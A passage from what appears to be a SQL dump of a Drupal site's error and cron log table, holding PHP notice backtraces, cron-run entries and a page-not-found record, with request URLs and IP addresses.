/var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4431,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4432,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4433,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:6:\"6.28ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4434,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"10.72ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4435,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.46ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4436,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"10.22ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4437,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.99ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4438,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.62ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4439,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.96ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4440,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:6:\"7.58ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4441,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"10.68ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4442,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"56.54ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222036),(4443,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222036),(4444,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:53:\"/pt/ms/ms/informacoes-4700-311-braga/ms-90047454-p-4/\";}',4,'','http://clidentcastelo.pt/pt/ms/ms/informacoes-4700-311-braga/ms-90047454-p-4/','','54.36.148.199',1580228152),(4445,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239450),(4446,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"12.09ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239450),(4447,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"13.15ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239450),(4448,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.01ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239450),(4449,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"28.47ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4450,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.85ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4451,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.42ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4452,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"1.74ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4453,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"16.92ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4454,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"19.57ms\";}',5,'','http://clidentcastelo.pt/ads.txt','','66.249.64.227',1580239451),(4455,0,'cron','Execution of 